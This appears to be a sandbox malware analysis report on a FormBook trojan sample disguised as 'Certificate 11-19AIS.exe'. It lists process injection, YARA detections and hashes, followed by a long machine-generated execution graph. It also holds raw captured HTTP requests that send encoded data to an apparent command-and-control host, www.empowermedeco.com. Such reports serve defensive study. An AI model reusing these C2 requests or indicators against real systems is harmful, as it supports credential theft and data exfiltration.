                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            22 | 192.168.2.11 | 49997 | 217.196.55.202 | 80 | 3796 | C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Nov 25, 2024 14:00:47.613682032 CET | 802 | OUT | POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.empowermedeco.com
                                                                            Origin: http://www.empowermedeco.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Referer: http://www.empowermedeco.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: zh=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhdQhxCHYPzY/J2jmDDSmAv1K/RTJWekjko=
                                                                            Timestamp: Nov 25, 2024 14:00:48.947330952 CET  Bytes transferred: 1085  Direction: IN  Data:
                                                                            HTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Mon, 25 Nov 2024 13:00:48 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session ID: 23  Source IP: 192.168.2.11  Source Port: 49998  Destination IP: 217.196.55.202  Destination Port: 80  PID: 3796  Process: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp: Nov 25, 2024 14:00:50.292552948 CET  Bytes transferred: 1815  Direction: OUT  Data:
                                                                            POST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.empowermedeco.com
                                                                            Origin: http://www.empowermedeco.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 1231
                                                                            Referer: http://www.empowermedeco.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Ascii: zh= [TRUNCATED]
                                                                            Timestamp: Nov 25, 2024 14:00:51.550539017 CET  Bytes transferred: 1085  Direction: IN  Data:
                                                                            HTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Mon, 25 Nov 2024 13:00:51 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session ID: 24  Source IP: 192.168.2.11  Source Port: 49999  Destination IP: 217.196.55.202  Destination Port: 80  PID: 3796  Process: C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Timestamp: Nov 25, 2024 14:00:53.091805935 CET  Bytes transferred: 510  Direction: OUT  Data:
                                                                            GET /fo8o/?zh=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&HpnH2=lZrlsdK8B4Q HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.empowermedeco.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Timestamp: Nov 25, 2024 14:00:54.381639004 CET  Bytes transferred: 1227  Direction: IN  Data:
                                                                            HTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Mon, 25 Nov 2024 13:00:54 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.empowermedeco.com/fo8o/?zh=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&HpnH2=lZrlsdK8B4Q
                                                                            platform: hostinger
                                                                            panel: hpanel
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>



                                                                            Target ID:0
                                                                            Start time:07:56:57
                                                                            Start date:25/11/2024
                                                                            Path:C:\Users\user\Desktop\Certificate 11-19AIS.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Certificate 11-19AIS.exe"
                                                                            Imagebase:0x7b0000
                                                                            File size:1'203'200 bytes
                                                                            MD5 hash:1E1DB5D9C073FCFF1706C32D887E3E28
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:07:56:59
                                                                            Start date:25/11/2024
                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Certificate 11-19AIS.exe"
                                                                            Imagebase:0x6b0000
                                                                            File size:46'504 bytes
                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1456819378.0000000003280000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1456306126.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1457331326.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:07:57:06
                                                                            Start date:25/11/2024
                                                                            Path:C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe"
                                                                            Imagebase:0x3f0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3780667832.0000000002630000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:4
                                                                            Start time:07:57:07
                                                                            Start date:25/11/2024
                                                                            Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                            Imagebase:0x280000
                                                                            File size:22'016 bytes
                                                                            MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3780531948.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3773648574.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3774196358.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:6
                                                                            Start time:07:57:21
                                                                            Start date:25/11/2024
                                                                            Path:C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\qjwUrvbCXhnUchtpWXaONmAlxNsulNDCTTNJCecuZgIsyHrx\auecFLppjswMvwfJiAu.exe"
                                                                            Imagebase:0x3f0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3783040260.00000000057B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:8
                                                                            Start time:07:57:33
                                                                            Start date:25/11/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff6de060000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true


                                                                              Execution Graph

                                                                              Execution Coverage:4.1%
                                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                                              Signature Coverage:6.8%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:168
_doexit 93942->93957 93946->93927 93947->93933 93949->93929 93950->93938 93952 7d1ca6 RtlFreeHeap 93951->93952 93953 7d1ccf __dosmaperr 93951->93953 93952->93953 93954 7d1cbb 93952->93954 93953->93942 93958 7d7c0e 47 API calls __getptd_noexit 93954->93958 93956 7d1cc1 GetLastError 93956->93953 93957->93928 93958->93956 93959->93845 93960->93852 93961->93863 93963 7d6e2b 93962->93963 93968 7d6cb5 93963->93968 93967 7d6e46 93967->93866 93969 7d6ccf _memset __call_reportfault 93968->93969 93970 7d6cef IsDebuggerPresent 93969->93970 93976 7d81ac SetUnhandledExceptionFilter UnhandledExceptionFilter 93970->93976 93973 7d6dd6 93975 7d8197 GetCurrentProcess TerminateProcess 93973->93975 93974 7d6db3 __call_reportfault 93977 7da70c 93974->93977 93975->93967 93976->93974 93978 7da714 93977->93978 93979 7da716 IsProcessorFeaturePresent 93977->93979 93978->93973 93981 7e37b0 93979->93981 93984 7e375f 5 API calls 2 library calls 93981->93984 93983 7e3893 93983->93973 93984->93983 93985->93870 93987 7d7cf4 __lock 47 API calls 93986->93987 93988 7d1410 93987->93988 94051 7d7e58 LeaveCriticalSection 93988->94051 93990 7b3a88 93991 7d146d 93990->93991 93992 7d1491 93991->93992 93993 7d1477 93991->93993 93992->93878 93993->93992 94052 7d7c0e 47 API calls __getptd_noexit 93993->94052 93995 7d1481 94053 7d6e10 8 API calls ___strgtold12_l 93995->94053 93997 7d148c 93997->93878 93998->93880 94000 7b3d26 __ftell_nolock 93999->94000 94054 7bd7f7 94000->94054 94004 7b3d57 IsDebuggerPresent 94005 821cc1 MessageBoxA 94004->94005 94006 7b3d65 94004->94006 94008 821cd9 94005->94008 94006->94008 94009 7b3d82 94006->94009 94037 7b3e3a 94006->94037 94007 7b3e41 SetCurrentDirectoryW 94010 7b3e4e Mailbox 94007->94010 94256 7cc682 48 API calls 94008->94256 94133 7b40e5 94009->94133 94010->93882 94013 821ce9 94018 821cff SetCurrentDirectoryW 94013->94018 94015 7b3da0 GetFullPathNameW 94149 7b6a63 94015->94149 94017 7b3ddb 94160 7b6430 94017->94160 94018->94010 94021 7b3df6 94022 7b3e00 94021->94022 
94257 7f71fa AllocateAndInitializeSid CheckTokenMembership FreeSid 94021->94257 94176 7b3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 94022->94176 94025 821d1c 94025->94022 94028 821d2d 94025->94028 94258 7b5374 94028->94258 94029 7b3e0a 94031 7b3e1f 94029->94031 94184 7b4ffc 94029->94184 94194 7be8d0 94031->94194 94032 821d35 94265 7bce19 94032->94265 94037->94007 94038 821d42 94040 821d49 94038->94040 94041 821d6e 94038->94041 94271 7b518c 94040->94271 94042 7b518c 48 API calls 94041->94042 94044 821d6a GetForegroundWindow ShellExecuteW 94042->94044 94049 821d9e Mailbox 94044->94049 94049->94037 94051->93990 94052->93995 94053->93997 94290 7cf4ea 94054->94290 94056 7bd818 94057 7cf4ea 48 API calls 94056->94057 94058 7b3d31 GetCurrentDirectoryW 94057->94058 94059 7b61ca 94058->94059 94321 7ce99b 94059->94321 94063 7b61eb 94064 7b5374 50 API calls 94063->94064 94065 7b61ff 94064->94065 94066 7bce19 48 API calls 94065->94066 94067 7b620c 94066->94067 94338 7b39db 94067->94338 94069 7b6216 Mailbox 94350 7b6eed 94069->94350 94074 7bce19 48 API calls 94075 7b6244 94074->94075 94357 7bd6e9 94075->94357 94077 7b6254 Mailbox 94078 7bce19 48 API calls 94077->94078 94079 7b627c 94078->94079 94080 7bd6e9 55 API calls 94079->94080 94081 7b628f Mailbox 94080->94081 94082 7bce19 48 API calls 94081->94082 94083 7b62a0 94082->94083 94361 7bd645 94083->94361 94085 7b62b2 Mailbox 94086 7bd7f7 48 API calls 94085->94086 94087 7b62c5 94086->94087 94371 7b63fc 94087->94371 94091 7b62df 94092 7b62e9 94091->94092 94093 821c08 94091->94093 94094 7d0fa7 _W_store_winword 59 API calls 94092->94094 94095 7b63fc 48 API calls 94093->94095 94096 7b62f4 94094->94096 94097 821c1c 94095->94097 94096->94097 94098 7b62fe 94096->94098 94100 7b63fc 48 API calls 94097->94100 94099 7d0fa7 _W_store_winword 59 API calls 94098->94099 94101 7b6309 94099->94101 94102 821c38 94100->94102 94101->94102 94103 7b6313 94101->94103 94104 7b5374 50 API calls 94102->94104 94105 7d0fa7 
_W_store_winword 59 API calls 94103->94105 94106 821c5d 94104->94106 94107 7b631e 94105->94107 94108 7b63fc 48 API calls 94106->94108 94109 7b635f 94107->94109 94111 821c86 94107->94111 94114 7b63fc 48 API calls 94107->94114 94112 821c69 94108->94112 94110 7b636c 94109->94110 94109->94111 94387 7cc050 94110->94387 94115 7b6eed 48 API calls 94111->94115 94113 7b6eed 48 API calls 94112->94113 94117 821c77 94113->94117 94118 7b6342 94114->94118 94119 821ca8 94115->94119 94122 7b63fc 48 API calls 94117->94122 94123 7b6eed 48 API calls 94118->94123 94120 7b63fc 48 API calls 94119->94120 94124 821cb5 94120->94124 94121 7b6384 94398 7c1b90 94121->94398 94122->94111 94126 7b6350 94123->94126 94124->94124 94127 7b63fc 48 API calls 94126->94127 94127->94109 94128 7b6394 94129 7c1b90 48 API calls 94128->94129 94131 7b63fc 48 API calls 94128->94131 94132 7b63d6 Mailbox 94128->94132 94414 7b6b68 48 API calls 94128->94414 94129->94128 94131->94128 94132->94004 94134 7b40f2 __ftell_nolock 94133->94134 94135 7b410b 94134->94135 94136 82370e _memset 94134->94136 94923 7b660f 94135->94923 94138 82372a GetOpenFileNameW 94136->94138 94140 823779 94138->94140 94143 7b6a63 48 API calls 94140->94143 94145 82378e 94143->94145 94145->94145 94146 7b4129 94948 7b4139 94146->94948 94150 7b6adf 94149->94150 94153 7b6a6f __wsetenvp 94149->94153 94151 7bb18b 48 API calls 94150->94151 94152 7b6ab6 ___crtGetEnvironmentStringsW 94151->94152 94152->94017 94154 7b6a8b 94153->94154 94155 7b6ad7 94153->94155 95168 7b6b4a 94154->95168 95171 7bc369 48 API calls 94155->95171 94158 7b6a95 94159 7cee75 48 API calls 94158->94159 94159->94152 94161 7b643d __ftell_nolock 94160->94161 95172 7b4c75 94161->95172 94163 7b6442 94175 7b3dee 94163->94175 95183 7b5928 86 API calls 94163->95183 94165 7b644f 94165->94175 95184 7b5798 88 API calls Mailbox 94165->95184 94167 7b6458 94168 7b645c GetFullPathNameW 94167->94168 94167->94175 94169 7b6a63 48 API calls 94168->94169 94170 7b6488 94169->94170 94171 7b6a63 48 API 
calls 94170->94171 94172 7b6495 94171->94172 94173 825dcf _wcscat 94172->94173 94174 7b6a63 48 API calls 94172->94174 94174->94175 94175->94013 94175->94021 94177 7b3ed8 94176->94177 94178 821cba 94176->94178 95231 7b4024 94177->95231 94182 7b3e05 94183 7b36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94182->94183 94183->94029 94185 7b5027 _memset 94184->94185 95236 7b4c30 94185->95236 94188 7b50ac 94190 7b50ca Shell_NotifyIconW 94188->94190 94191 823d28 Shell_NotifyIconW 94188->94191 95240 7b51af 94190->95240 94193 7b50df 94193->94031 94195 7be8f6 94194->94195 94218 7be906 Mailbox 94194->94218 94197 7bed52 94195->94197 94195->94218 94196 7fcc5c 86 API calls 94196->94218 95389 7ce3cd 331 API calls 94197->95389 94198 7bebc7 94200 7b3e2a 94198->94200 95390 7b2ff6 16 API calls 94198->95390 94200->94037 94255 7b3847 Shell_NotifyIconW _memset 94200->94255 94202 7bed63 94202->94200 94204 7bed70 94202->94204 94203 7be94c PeekMessageW 94203->94218 95391 7ce312 331 API calls Mailbox 94204->95391 94206 82526e Sleep 94206->94218 94207 7bed77 LockWindowUpdate DestroyWindow GetMessageW 94207->94200 94209 7beda9 94207->94209 94210 8259ef TranslateMessage DispatchMessageW GetMessageW 94209->94210 94210->94210 94213 825a1f 94210->94213 94212 7b1caa 49 API calls 94212->94218 94213->94200 94214 7bed21 PeekMessageW 94214->94218 94216 7bebf7 timeGetTime 94216->94218 94217 7b6eed 48 API calls 94217->94218 94218->94196 94218->94198 94218->94203 94218->94206 94218->94212 94218->94214 94218->94216 94218->94217 94219 7bed3a TranslateMessage DispatchMessageW 94218->94219 94220 7cf4ea 48 API calls 94218->94220 94221 825557 WaitForSingleObject 94218->94221 94223 82588f Sleep 94218->94223 94225 7bedae timeGetTime 94218->94225 94228 825733 Sleep 94218->94228 94230 7b2aae 307 API calls 94218->94230 94236 825445 Sleep 94218->94236 94245 825429 Mailbox 94218->94245 94253 7bce19 48 API calls 94218->94253 94254 7bd6e9 55 API calls 94218->94254 95263 7bef00 94218->95263 95270 7bf110 
94218->95270 95335 7c45e0 94218->95335 95352 7ce244 94218->95352 95357 7cdc5f 94218->95357 95362 7beed0 331 API calls Mailbox 94218->95362 95363 7c3200 94218->95363 95393 818d23 48 API calls 94218->95393 95397 7bfe30 94218->95397 94219->94214 94220->94218 94221->94218 94224 825574 GetExitCodeProcess CloseHandle 94221->94224 94222 7bd7f7 48 API calls 94222->94245 94223->94245 94224->94218 95392 7b1caa 49 API calls 94225->95392 94228->94245 94230->94218 94232 7cdc38 timeGetTime 94232->94245 94233 825926 GetExitCodeProcess 94234 825952 CloseHandle 94233->94234 94235 82593c WaitForSingleObject 94233->94235 94234->94245 94235->94218 94235->94234 94236->94218 94237 7b2c79 107 API calls 94237->94245 94239 825432 Sleep 94239->94236 94240 818c4b 108 API calls 94240->94245 94241 8259ae Sleep 94241->94218 94243 7bce19 48 API calls 94243->94245 94245->94218 94245->94222 94245->94232 94245->94233 94245->94236 94245->94237 94245->94239 94245->94240 94245->94241 94245->94243 94248 7bd6e9 55 API calls 94245->94248 95394 7f4cbe 49 API calls Mailbox 94245->95394 95395 7b1caa 49 API calls 94245->95395 95396 7b2aae 331 API calls 94245->95396 95426 80ccb2 50 API calls 94245->95426 95427 7f7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 94245->95427 95428 7f6532 63 API calls 3 library calls 94245->95428 94248->94245 94253->94218 94254->94218 94255->94037 94256->94013 94257->94025 94259 7df8a0 __ftell_nolock 94258->94259 94260 7b5381 GetModuleFileNameW 94259->94260 94261 7bce19 48 API calls 94260->94261 94262 7b53a7 94261->94262 94263 7b660f 49 API calls 94262->94263 94264 7b53b1 Mailbox 94263->94264 94264->94032 94266 7bce28 __wsetenvp 94265->94266 94267 7cee75 48 API calls 94266->94267 94268 7bce50 ___crtGetEnvironmentStringsW 94267->94268 94269 7cf4ea 48 API calls 94268->94269 94270 7bce66 94269->94270 94270->94038 94272 7b5197 94271->94272 94273 7b519f 94272->94273 94274 821ace 94272->94274 95723 7b5130 94273->95723 94275 7b6b4a 48 API calls 
94274->94275 94278 821adb __wsetenvp 94275->94278 94277 7b51aa 94281 7b510d 94277->94281 94279 7cee75 48 API calls 94278->94279 94280 821b07 ___crtGetEnvironmentStringsW 94279->94280 94282 7b511f 94281->94282 94283 821be7 94281->94283 95733 7bb384 94282->95733 95742 7ea58f 48 API calls ___crtGetEnvironmentStringsW 94283->95742 94286 821bf1 94288 7b6eed 48 API calls 94286->94288 94287 7b512b 94289 821bf9 Mailbox 94288->94289 94293 7cf4f2 __calloc_impl 94290->94293 94292 7cf50c 94292->94056 94293->94292 94294 7cf50e std::exception::exception 94293->94294 94299 7d395c 94293->94299 94313 7d6805 RaiseException 94294->94313 94296 7cf538 94314 7d673b 47 API calls _free 94296->94314 94298 7cf54a 94298->94056 94300 7d39d7 __calloc_impl 94299->94300 94303 7d3968 __calloc_impl 94299->94303 94320 7d7c0e 47 API calls __getptd_noexit 94300->94320 94301 7d3973 94301->94303 94315 7d81c2 47 API calls 2 library calls 94301->94315 94316 7d821f 47 API calls 8 library calls 94301->94316 94317 7d1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94301->94317 94303->94301 94305 7d399b RtlAllocateHeap 94303->94305 94308 7d39c3 94303->94308 94311 7d39c1 94303->94311 94305->94303 94306 7d39cf 94305->94306 94306->94293 94318 7d7c0e 47 API calls __getptd_noexit 94308->94318 94319 7d7c0e 47 API calls __getptd_noexit 94311->94319 94313->94296 94314->94298 94315->94301 94316->94301 94318->94311 94319->94306 94320->94306 94322 7bd7f7 48 API calls 94321->94322 94323 7b61db 94322->94323 94324 7b6009 94323->94324 94325 7b6016 __ftell_nolock 94324->94325 94326 7b6a63 48 API calls 94325->94326 94330 7b617c Mailbox 94325->94330 94328 7b6048 94326->94328 94336 7b607e Mailbox 94328->94336 94415 7b61a6 94328->94415 94329 7b614f 94329->94330 94331 7bce19 48 API calls 94329->94331 94330->94063 94333 7b6170 94331->94333 94332 7bce19 48 API calls 94332->94336 94334 7b64cf 48 API calls 94333->94334 94334->94330 94336->94329 94336->94330 94336->94332 94337 7b61a6 48 API calls 94336->94337 
